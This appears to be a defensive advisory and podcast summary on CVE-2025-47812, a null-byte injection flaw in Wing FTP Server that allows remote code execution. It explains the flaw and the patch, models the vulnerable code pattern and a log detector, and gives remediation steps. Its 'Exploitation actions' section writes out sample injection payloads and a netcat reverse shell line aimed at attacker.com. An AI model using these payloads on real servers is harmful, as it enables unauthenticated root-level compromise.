Wing FTP Server: remote code execution via null byte injection in Wing FTP Server (CVE-2025-47812) #shorts
Summary
Today on the Cyber Spotlight Podcast, we’re diving into CVE-2025-47812, a critical remote code execution flaw in Wing FTP Server. Published on July 10, 2025 and patched in version 7.4.4, this vulnerability allows unauthenticated attackers – even anonymous FTP users – to inject arbitrary Lua code and execute system commands with root or SYSTEM privileges. Active exploitation has already been confirmed in the wild, making immediate patching essential for all affected installations.
Product details
Wing FTP Server is a popular cross-platform FTP, FTPS, SFTP and HTTP(S) file transfer solution used by businesses, government agencies, and service providers. It supports web-based user and admin interfaces written in Lua. Versions prior to 7.4.4 contain the vulnerability; once patched, the product addresses null-byte mishandling in both admin and user session components.
Vulnerability type summary
CVE-2025-47812 is classified under CWE-158: Improper Neutralization of Null Byte or NUL Character. By failing to sanitize '\0' characters in web requests, the application allows attackers to manipulate session files and inject arbitrary Lua scripting logic, resulting in remote code execution at the operating system level.
Details of the vulnerability
In versions before 7.4.4, both the user and admin web interfaces accept input containing null bytes without proper validation. An attacker crafts a request containing '\0' sequences that break out of intended data fields and append malicious Lua code to session files. When Wing FTP Server processes those session files, it executes the injected code with full FTP-service privileges—root on Linux or SYSTEM on Windows. Since anonymous FTP accounts can also trigger this behavior, no valid credentials are required. Huntress and other researchers have observed active exploitation targeting corporate and public servers.
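To make the truncation mismatch concrete, here is an added Python model (not Wing FTP Server's code) of the vulnerable pattern beside its hardened form, plus a scan for the `%00` marker in request logs; the session-file layout, function names and log lines are constructed for illustration.

```python
# Added example, not from Wing FTP Server: models the CWE-158 mismatch behind
# CVE-2025-47812 and two defender-side checks. All names and data are constructed.
import re
from typing import Optional
from urllib.parse import unquote_to_bytes


def c_string_view(value: bytes) -> bytes:
    """What C-style string functions see: the bytes up to the first NUL only."""
    nul = value.find(b"\x00")
    return value if nul < 0 else value[:nul]


def vulnerable_session_record(username: bytes, allowed: set) -> Optional[str]:
    """Vulnerable pattern: the account check runs on the truncated view, but the
    full, untruncated bytes are serialised into a Lua-syntax session file, so
    everything after the NUL lands in a file the Lua interpreter later loads."""
    if c_string_view(username) not in allowed:
        return None
    body = username.decode("latin-1")  # keeps every byte, NUL included
    return f'session = {{ user = "{body}" }}'


def hardened_session_record(username: bytes, allowed: set) -> Optional[str]:
    """Fix: reject a NUL anywhere in the parameter before any check or write,
    so the value that was validated is byte-for-byte the value that is stored."""
    if b"\x00" in username or username not in allowed:
        return None
    return f'session = {{ user = "{username.decode("ascii")}" }}'


# A percent-encoded NUL in the request, or a raw NUL that slipped through decoding.
_NUL_PATTERN = re.compile(rb"%00|\x00", re.IGNORECASE)


def flag_requests(log_lines: list) -> list:
    """Return the access-log lines whose request carries a NUL, encoded or raw."""
    return [line for line in log_lines if _NUL_PATTERN.search(line)]


# Constructed access-log lines (not real Wing FTP Server output).
SAMPLE_LOG = [
    b'10.0.0.5 - - [10/Jul/2025:12:00:01 +0000] "POST /admin/login HTTP/1.1" 200 user=alice',
    b'10.0.0.9 - - [10/Jul/2025:12:00:07 +0000] "POST /admin/login HTTP/1.1" 200 user=anonymous%00TRAILING',
]

if __name__ == "__main__":
    raw = unquote_to_bytes("anonymous%00-- trailing bytes")
    print("C view:", c_string_view(raw))
    print("vulnerable record:", vulnerable_session_record(raw, {b"anonymous"}))
    print("hardened record:", hardened_session_record(raw, {b"anonymous"}))
    print("flagged:", flag_requests(SAMPLE_LOG))
```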
Conclusion
CVE-2025-47812 represents a severe threat: full server compromise via a simple null-byte injection. Administrators must upgrade Wing FTP Server to version 7.4.4 or later without delay, verify no unpatched instances remain exposed to the internet, and review logs for suspicious activity around July 2025. Regular patch management and monitoring remain your best defenses against rapidly exploited RCE vulnerabilities.
Watch the full video on YouTube: CVE-2025-47812
Remediation and exploitation details
This chain involves the following actors
- Attacker: Malicious actor exploiting the null-byte handling flaw
- Wing FTP Server Administrator: Responsible for deploying patches and securing the server
The following systems are involved
- Wing FTP Server (File transfer and management): Target application where session files are created and parsed
- Operating System (Host environment for Wing FTP Server): Execution context for arbitrary commands
Attack entry point
- Anonymous FTP Interface: Allows unauthenticated file uploads that trigger session handling
- Web Administration Interface: Accepts user parameters that can include null byte sequences
Remediation actions
- Upgrade Wing FTP Server to version 7.4.4 or later
- Verify that no unpatched instances remain exposed to the internet
- Review logs for suspicious activity around July 2025
Exploitation actions
Null-byte injection in HTTP or FTP parameters
- STOR /sessions/admin%00<?lua os.execute('id > /tmp/out') ?>.session
- POST /admin/login HTTP/1.1\r\nHost: target\r\nContent-Length: ...\r\n\r\nuser=admin%00require('os').execute('whoami')
Session-file creation with mishandled null terminator
- The server truncates the string at the null, then appends the Lua snippet as valid code
Normal session resume or periodic cleanup task
- Administrator or scheduled job reads the session and invokes the Lua interpreter
Lua os.execute or io.popen invocation
- os.execute('nc attacker.com 4444 -e /bin/sh')
Interactive reverse shell or scheduled task drop
- Interactive root shell via netcat or Meterpreter stager
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://www.wftpserver.com
- https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
- [2025-06-30] Discussion about a remote code execution vulnerability in Wing FTP Server (CVE-2025-47812).
- [2025-07-10] A critical vulnerability in Wing FTP Server up to 7.4.3 allows for remote code execution.
- [2025-07-11] Active exploitation of a critical RCE vulnerability in Wing FTP Server, CVE-2025-47812, confirmed by Huntress.
- [2025-07-11] Threat actors are actively exploiting a recently fixed remote code execution vulnerability (CVE-2025-47812) in Wing FTP Server.
- [2025-07-11] A critical vulnerability in Wing FTP Server (CVE-2025-47812) is being exploited in the wild.